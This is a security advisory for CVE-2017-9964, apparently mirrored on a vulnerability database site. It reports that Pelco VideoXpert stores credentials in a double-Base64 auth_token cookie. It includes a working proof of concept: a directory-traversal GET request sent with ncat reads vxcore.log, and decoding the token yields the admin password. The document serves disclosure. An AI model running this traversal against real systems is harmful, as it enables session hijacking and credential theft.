Vulners
Lucene search
Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Schneider Electric Pelco VideoXpert Enterprise Directory Traversal Vulnerability | 28 Dec 201700:00 | – | cnvd |
 | CVE-2017-9964 | 2 Jan 201803:00 | – | cve |
 | CVE-2017-9964 | 2 Jan 201803:00 | – | cvelist |
 | EUVD-2017-18873 | 7 Oct 202500:30 | – | euvd |
 | Schneider Electric Pelco VideoXpert Enterprise | 21 Dec 201700:00 | – | ics |
 | CVE-2017-9964 | 2 Jan 201803:29 | – | nvd |
 | Pelco VideoXpert Multiple Vulnerabilities | 11 Jul 201700:00 | – | openvas |
 | CVE-2017-9964 | 2 Jan 201803:29 | – | osv |
 | Path traversal | 2 Jan 201803:29 | – | prion |
<html><body><p>Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
1.14.7
1.12.105
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: The software transmits sensitive data using double Base64 encoding
for the Cookie 'auth_token' in a communication channel that can be
sniffed by unauthorized actors or arbitrarely be read from the vxcore
log file directly using directory traversal attack resulting in
authentication bypass / session hijacking.
Ref: ZSL-2017-5419
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Jetty(9.2.6.v20141205)
MongoDB/3.2.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5420
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5420.php
05.04.2017
--
After a user logs in, the web server creates a Cookie: auth_token which has the following value:
ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
Base64 decoding that becomes:
eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbjEyMyIsImRvbWFpbiI6IkxPQ0FMIiwiZXhwaXJlcyI6MTQ5MTU1Njc5NzE1OCwiYWdlbnQiOiI0MGY2NDM4Ni1mZmMwLTQ1NDEtOWNjZC1hNTIyM2RiMmZjMDkiLCJjbGllbnRJcCI6IjEyNy4wLjAuMSJ9
Again decoding, gives us result:
{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
PoC remote session takeover with directory traversal:
-----------------------------------------------------
bash-4.4$ cat pelco_live.txt
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: text/plain; charset=utf-8
Accept: */*
Referer: https://127.0.0.1/portal/
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
bash-4.4$ ncat -v -n 127.0.0.1 80 < pelco_live.txt > vxcore_log.txt
bash-4.4$ cat vxcore_log.txt
--snip--
INFO [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed.
INFO [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html
INFO [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css
INFO [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js
--snip--
bash-4.4$ cat pelco_auth_token.txt
ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D -
{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
bash-4.4$
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jul 2017 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 25.8
CVSS 36.9
EPSS0.00693